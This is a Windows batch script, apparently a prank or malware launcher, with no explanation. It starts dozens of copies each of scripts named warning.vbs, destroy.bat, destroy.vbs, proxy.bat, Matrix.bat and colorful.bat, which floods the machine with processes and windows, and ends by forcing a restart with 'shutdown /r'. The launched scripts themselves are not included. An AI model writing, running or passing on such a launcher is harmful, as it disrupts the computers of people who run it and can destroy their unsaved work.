@echo off
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start cmd.bat
start destroy.bat
start destroy.bat
start destroy.bat
start destroy.bat
start destroy.bat
start destroy.bat
start destroy.bat
start destroy.bat
start destroy.bat
start destroy.bat
start cmd.bat
start Matrix.bat
start Matrix.bat
start Matrix.bat
start Matrix.bat
start Matrix.bat
start Matrix.bat
start Matrix.bat
start Matrix.bat
start Matrix.bat
start Matrix.bat
start Matrix.bat
start Matrix.bat
start Matrix.bat
start Matrix.bat
start Matrix.bat
start Matrix.bat
start Matrix.bat
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start warning.vbs
start proxy.bat
start proxy.bat
start proxy.bat
start proxy.bat
start proxy.bat
start proxy.bat
start proxy.bat
start proxy.bat
start proxy.bat
start proxy.bat
start proxy.bat
start proxy.bat
start proxy.bat
start proxy.bat
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.vbs
start destroy.bat
start colorful.bat
start colorful.bat
start colorful.bat
start colorful.bat
start colorful.bat
start colorful.bat
start colorful.bat
start colorful.bat
start colorful.bat
start colorful.bat
start colorful.bat
start colorful.bat
shutdown /r